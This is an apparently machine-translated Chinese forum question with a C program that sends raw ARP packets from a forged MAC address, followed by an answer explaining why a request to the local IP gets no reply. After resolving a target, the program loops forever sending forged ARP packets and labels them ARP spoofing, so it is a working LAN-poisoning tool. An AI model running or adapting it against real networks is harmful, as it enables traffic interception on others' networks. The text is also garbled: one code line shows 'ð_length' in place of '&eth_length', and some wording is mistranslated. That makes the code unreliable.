我构建了具有随机ip和MAC地址的ARP数据包(例如,172.29.26.152和0x52,0x54,0x4C,0x00,0x08,0x00)。
在我的电脑上运行该程序。
因此程序将数据包发送到我自己的NIC(ip:172.29.26.102)eth0以获取其MAC地址。
但我没有收到eth0的回复。
我使用tcpdump -i lo -n -XX并且不显示任何数据包。我可以使用tcpdump -i eth0 host 172.29.26.152 -n -XX构建数据包。
为什么主持人没有回复?非常感谢你!
代码:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <unistd.h>
void packarp(char *mymac, char *tarmac, int *tarip, int *myip, char *opcode, char *arppack)
{
char eth_type[2] = {0x00,0x01};
char por_type[2] = {0x08,0x00};
char type[2] = {0x08, 0x06};
char eth_length = 6;
char por_length = 4;
memset(arppack, 0, 42);
memcpy(arppack, tarmac, 6);
memcpy(arppack + 6, mymac, 6);
memcpy(arppack + 12, type, 2);
memcpy(arppack + 14, eth_type, 2);
memcpy(arppack + 16, por_type, 2);
memcpy(arppack + 18, ð_length, 1);
memcpy(arppack + 19, &por_length, 1);
memcpy(arppack + 20, opcode, 2);
memcpy(arppack + 22, mymac, 6);
memcpy(arppack + 28, myip, 4);
if (!(opcode[0] == 0x00 && opcode[1] == 0x01)) {
memcpy(arppack + 32, tarmac, 6);
}
memcpy(arppack + 38, tarip, 4);
}
int main(int argc, char *argv[])
{
char mymac[6] = {0x52,0x54,0x4C,0x00,0x08,0x00};
char tarmac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
char recvarp[42] = {0};
char sendarp[42] = {0};
int tarip;
int myip;
char opcode[2];
int sock_fd,p;
struct sockaddr addr;
if (argc < 4) {
return EXIT_FAILURE;
}
myip = inet_addr(argv[3]);
tarip = inet_addr(argv[2]);
opcode[0] = 0x00;
opcode[1] = 0x01;
packarp(mymac, tarmac, &tarip, &myip, opcode, sendarp);
if ((sock_fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
perror("Open Socket");
return EXIT_FAILURE;
}
memset(&addr, 0, sizeof(addr));
strncpy(addr.sa_data, argv[1], sizeof(addr.sa_data));
socklen_t len = sizeof(addr);
while(1) {
if (sendto(sock_fd, sendarp, 42, 0, &addr, len) == 42) {
for(p = 0; p < 42;p++)
{
printf("%02x ",(unsigned char)sendarp[p]);
}
printf(".\nSend ARP packet successful.\n\n");
} else {
perror("sendto");
return EXIT_FAILURE;
}
if (recvfrom(sock_fd, recvarp, 42, 0, &addr, &len) == 42) {
if (!memcmp((void *)recvarp + 28, (void *)sendarp + 38, 4)) {
memcpy(tarmac, recvarp + 22, 6);
printf("Succeed to get MAC address.\n");
break;
}
}
for(p = 0; p < 42;p++)
{
printf("%02x ",(unsigned char)recvarp[p]);
}
printf(".\n\n");
sleep(1);
}
opcode[0] = 0x00;
opcode[1] = 0x01;
packarp(mymac, tarmac, &tarip, &myip, opcode, sendarp);
while(1) {
if (sendto(sock_fd, sendarp, 42, 0, &addr, len) == 42) {
for(p = 0; p < 42;p++)
{
printf("%02x ",(unsigned char)sendarp[p]);
}
printf("Succeed to send ARP Spoofing. \n");
} else {
perror("sendto");
return EXIT_FAILURE;
}
sleep(1);
}
close(sock_fd);
return EXIT_SUCCESS;
}
答案 0 :(得分:0)
您的代码是正确的,它能够向/从远程计算机发送和接收ARP数据包。问题是您正在尝试发送本地IP地址的ARP请求。
创建的ARP请求传递给网络驱动程序并发送到物理层。网络驱动程序将数据包作为刚刚发送的传出数据包处理。线路另一端的交换机或任何设备不会将ARP请求转发回接收它的接口。
因此本地操作系统永远不会收到ARP请求,也无法响应。 tcpdump捕获并显示传出的ARP请求。没有来一个。